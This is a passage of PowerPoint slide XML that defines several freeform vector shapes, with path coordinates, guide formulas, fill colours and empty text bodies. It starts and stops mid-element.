                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="42"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36464" name="Freeform 196"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3093" y="2160"/>
                <a:ext cx="98" cy="67"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 98"/>
                  <a:gd name="T1" fmla="*/ 40 h 67"/>
                  <a:gd name="T2" fmla="*/ 2 w 98"/>
                  <a:gd name="T3" fmla="*/ 32 h 67"/>
                  <a:gd name="T4" fmla="*/ 10 w 98"/>
                  <a:gd name="T5" fmla="*/ 26 h 67"/>
                  <a:gd name="T6" fmla="*/ 0 w 98"/>
                  <a:gd name="T7" fmla="*/ 13 h 67"/>
                  <a:gd name="T8" fmla="*/ 1 w 98"/>
                  <a:gd name="T9" fmla="*/ 7 h 67"/>
                  <a:gd name="T10" fmla="*/ 6 w 98"/>
                  <a:gd name="T11" fmla="*/ 0 h 67"/>
                  <a:gd name="T12" fmla="*/ 12 w 98"/>
                  <a:gd name="T13" fmla="*/ 3 h 67"/>
                  <a:gd name="T14" fmla="*/ 10 w 98"/>
                  <a:gd name="T15" fmla="*/ 8 h 67"/>
                  <a:gd name="T16" fmla="*/ 18 w 98"/>
                  <a:gd name="T17" fmla="*/ 6 h 67"/>
                  <a:gd name="T18" fmla="*/ 29 w 98"/>
                  <a:gd name="T19" fmla="*/ 10 h 67"/>
                  <a:gd name="T20" fmla="*/ 37 w 98"/>
                  <a:gd name="T21" fmla="*/ 7 h 67"/>
                  <a:gd name="T22" fmla="*/ 49 w 98"/>
                  <a:gd name="T23" fmla="*/ 11 h 67"/>
                  <a:gd name="T24" fmla="*/ 65 w 98"/>
                  <a:gd name="T25" fmla="*/ 3 h 67"/>
                  <a:gd name="T26" fmla="*/ 73 w 98"/>
                  <a:gd name="T27" fmla="*/ 1 h 67"/>
                  <a:gd name="T28" fmla="*/ 80 w 98"/>
                  <a:gd name="T29" fmla="*/ 5 h 67"/>
                  <a:gd name="T30" fmla="*/ 94 w 98"/>
                  <a:gd name="T31" fmla="*/ 10 h 67"/>
                  <a:gd name="T32" fmla="*/ 98 w 98"/>
                  <a:gd name="T33" fmla="*/ 15 h 67"/>
                  <a:gd name="T34" fmla="*/ 95 w 98"/>
                  <a:gd name="T35" fmla="*/ 18 h 67"/>
                  <a:gd name="T36" fmla="*/ 91 w 98"/>
                  <a:gd name="T37" fmla="*/ 19 h 67"/>
                  <a:gd name="T38" fmla="*/ 88 w 98"/>
                  <a:gd name="T39" fmla="*/ 32 h 67"/>
                  <a:gd name="T40" fmla="*/ 85 w 98"/>
                  <a:gd name="T41" fmla="*/ 35 h 67"/>
                  <a:gd name="T42" fmla="*/ 82 w 98"/>
                  <a:gd name="T43" fmla="*/ 41 h 67"/>
                  <a:gd name="T44" fmla="*/ 86 w 98"/>
                  <a:gd name="T45" fmla="*/ 43 h 67"/>
                  <a:gd name="T46" fmla="*/ 89 w 98"/>
                  <a:gd name="T47" fmla="*/ 48 h 67"/>
                  <a:gd name="T48" fmla="*/ 79 w 98"/>
                  <a:gd name="T49" fmla="*/ 50 h 67"/>
                  <a:gd name="T50" fmla="*/ 72 w 98"/>
                  <a:gd name="T51" fmla="*/ 49 h 67"/>
                  <a:gd name="T52" fmla="*/ 64 w 98"/>
                  <a:gd name="T53" fmla="*/ 57 h 67"/>
                  <a:gd name="T54" fmla="*/ 59 w 98"/>
                  <a:gd name="T55" fmla="*/ 59 h 67"/>
                  <a:gd name="T56" fmla="*/ 59 w 98"/>
                  <a:gd name="T57" fmla="*/ 64 h 67"/>
                  <a:gd name="T58" fmla="*/ 48 w 98"/>
                  <a:gd name="T59" fmla="*/ 67 h 67"/>
                  <a:gd name="T60" fmla="*/ 34 w 98"/>
                  <a:gd name="T61" fmla="*/ 60 h 67"/>
                  <a:gd name="T62" fmla="*/ 24 w 98"/>
                  <a:gd name="T63" fmla="*/ 63 h 67"/>
                  <a:gd name="T64" fmla="*/ 10 w 98"/>
                  <a:gd name="T65" fmla="*/ 66 h 67"/>
                  <a:gd name="T66" fmla="*/ 10 w 98"/>
                  <a:gd name="T67" fmla="*/ 61 h 67"/>
                  <a:gd name="T68" fmla="*/ 9 w 98"/>
                  <a:gd name="T69" fmla="*/ 52 h 67"/>
                  <a:gd name="T70" fmla="*/ 1 w 98"/>
                  <a:gd name="T71" fmla="*/ 45 h 67"/>
                  <a:gd name="T72" fmla="*/ 0 w 98"/>
                  <a:gd name="T73" fmla="*/ 42 h 67"/>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98"/>
                  <a:gd name="T112" fmla="*/ 0 h 67"/>
                  <a:gd name="T113" fmla="*/ 98 w 98"/>
                  <a:gd name="T114" fmla="*/ 67 h 67"/>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98" h="67">
                    <a:moveTo>
                      <a:pt x="0" y="42"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="42"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36465" name="Freeform 197"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2604" y="2774"/>
                <a:ext cx="95" cy="101"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 95"/>
                  <a:gd name="T1" fmla="*/ 94 h 101"/>
                  <a:gd name="T2" fmla="*/ 18 w 95"/>
                  <a:gd name="T3" fmla="*/ 84 h 101"/>
                  <a:gd name="T4" fmla="*/ 17 w 95"/>
                  <a:gd name="T5" fmla="*/ 79 h 101"/>
                  <a:gd name="T6" fmla="*/ 4 w 95"/>
                  <a:gd name="T7" fmla="*/ 69 h 101"/>
                  <a:gd name="T8" fmla="*/ 0 w 95"/>
                  <a:gd name="T9" fmla="*/ 67 h 101"/>
                  <a:gd name="T10" fmla="*/ 3 w 95"/>
                  <a:gd name="T11" fmla="*/ 60 h 101"/>
                  <a:gd name="T12" fmla="*/ 3 w 95"/>
                  <a:gd name="T13" fmla="*/ 53 h 101"/>
                  <a:gd name="T14" fmla="*/ 4 w 95"/>
                  <a:gd name="T15" fmla="*/ 51 h 101"/>
                  <a:gd name="T16" fmla="*/ 9 w 95"/>
                  <a:gd name="T17" fmla="*/ 44 h 101"/>
                  <a:gd name="T18" fmla="*/ 6 w 95"/>
                  <a:gd name="T19" fmla="*/ 39 h 101"/>
                  <a:gd name="T20" fmla="*/ 7 w 95"/>
                  <a:gd name="T21" fmla="*/ 36 h 101"/>
                  <a:gd name="T22" fmla="*/ 13 w 95"/>
                  <a:gd name="T23" fmla="*/ 38 h 101"/>
                  <a:gd name="T24" fmla="*/ 17 w 95"/>
                  <a:gd name="T25" fmla="*/ 37 h 101"/>
                  <a:gd name="T26" fmla="*/ 12 w 95"/>
                  <a:gd name="T27" fmla="*/ 31 h 101"/>
                  <a:gd name="T28" fmla="*/ 12 w 95"/>
                  <a:gd name="T29" fmla="*/ 26 h 101"/>
                  <a:gd name="T30" fmla="*/ 12 w 95"/>
                  <a:gd name="T31" fmla="*/ 22 h 101"/>
                  <a:gd name="T32" fmla="*/ 5 w 95"/>
                  <a:gd name="T33" fmla="*/ 16 h 101"/>
                  <a:gd name="T34" fmla="*/ 10 w 95"/>
                  <a:gd name="T35" fmla="*/ 8 h 101"/>
                  <a:gd name="T36" fmla="*/ 16 w 95"/>
                  <a:gd name="T37" fmla="*/ 4 h 101"/>
                  <a:gd name="T38" fmla="*/ 23 w 95"/>
                  <a:gd name="T39" fmla="*/ 10 h 101"/>
                  <a:gd name="T40" fmla="*/ 28 w 95"/>
                  <a:gd name="T41" fmla="*/ 5 h 101"/>
                  <a:gd name="T42" fmla="*/ 34 w 95"/>
                  <a:gd name="T43" fmla="*/ 0 h 101"/>
                  <a:gd name="T44" fmla="*/ 37 w 95"/>
                  <a:gd name="T45" fmla="*/ 2 h 101"/>
                  <a:gd name="T46" fmla="*/ 38 w 95"/>
                  <a:gd name="T47" fmla="*/ 7 h 101"/>
                  <a:gd name="T48" fmla="*/ 41 w 95"/>
                  <a:gd name="T49" fmla="*/ 8 h 101"/>
                  <a:gd name="T50" fmla="*/ 47 w 95"/>
                  <a:gd name="T51" fmla="*/ 5 h 101"/>
                  <a:gd name="T52" fmla="*/ 53 w 95"/>
                  <a:gd name="T53" fmla="*/ 6 h 101"/>
                  <a:gd name="T54" fmla="*/ 56 w 95"/>
                  <a:gd name="T55" fmla="*/ 11 h 101"/>
                  <a:gd name="T56" fmla="*/ 63 w 95"/>
                  <a:gd name="T57" fmla="*/ 17 h 101"/>
                  <a:gd name="T58" fmla="*/ 68 w 95"/>
                  <a:gd name="T59" fmla="*/ 16 h 101"/>
                  <a:gd name="T60" fmla="*/ 75 w 95"/>
                  <a:gd name="T61" fmla="*/ 13 h 101"/>
                  <a:gd name="T62" fmla="*/ 85 w 95"/>
                  <a:gd name="T63" fmla="*/ 14 h 101"/>
                  <a:gd name="T64" fmla="*/ 91 w 95"/>
                  <a:gd name="T65" fmla="*/ 18 h 101"/>
                  <a:gd name="T66" fmla="*/ 95 w 95"/>
                  <a:gd name="T67" fmla="*/ 38 h 101"/>
                  <a:gd name="T68" fmla="*/ 90 w 95"/>
                  <a:gd name="T69" fmla="*/ 48 h 101"/>
                  <a:gd name="T70" fmla="*/ 84 w 95"/>
                  <a:gd name="T71" fmla="*/ 65 h 101"/>
                  <a:gd name="T72" fmla="*/ 87 w 95"/>
                  <a:gd name="T73" fmla="*/ 75 h 101"/>
                  <a:gd name="T74" fmla="*/ 91 w 95"/>
                  <a:gd name="T75" fmla="*/ 89 h 101"/>
                  <a:gd name="T76" fmla="*/ 88 w 95"/>
                  <a:gd name="T77" fmla="*/ 86 h 101"/>
                  <a:gd name="T78" fmla="*/ 86 w 95"/>
                  <a:gd name="T79" fmla="*/ 88 h 101"/>
                  <a:gd name="T80" fmla="*/ 82 w 95"/>
                  <a:gd name="T81" fmla="*/ 88 h 101"/>
                  <a:gd name="T82" fmla="*/ 72 w 95"/>
                  <a:gd name="T83" fmla="*/ 86 h 101"/>
                  <a:gd name="T84" fmla="*/ 47 w 95"/>
                  <a:gd name="T85" fmla="*/ 88 h 101"/>
                  <a:gd name="T86" fmla="*/ 35 w 95"/>
                  <a:gd name="T87" fmla="*/ 92 h 101"/>
                  <a:gd name="T88" fmla="*/ 17 w 95"/>
                  <a:gd name="T89" fmla="*/ 101 h 101"/>
                  <a:gd name="T90" fmla="*/ 15 w 95"/>
                  <a:gd name="T91" fmla="*/ 101 h 101"/>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95"/>
                  <a:gd name="T139" fmla="*/ 0 h 101"/>
                  <a:gd name="T140" fmla="*/ 95 w 95"/>
                  <a:gd name="T141" fmla="*/ 101 h 101"/>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95" h="101">
                    <a:moveTo>
                      <a:pt x="15" y="101"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="101"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36466" name="Freeform 198"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2604" y="2774"/>
                <a:ext cx="95" cy="101"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
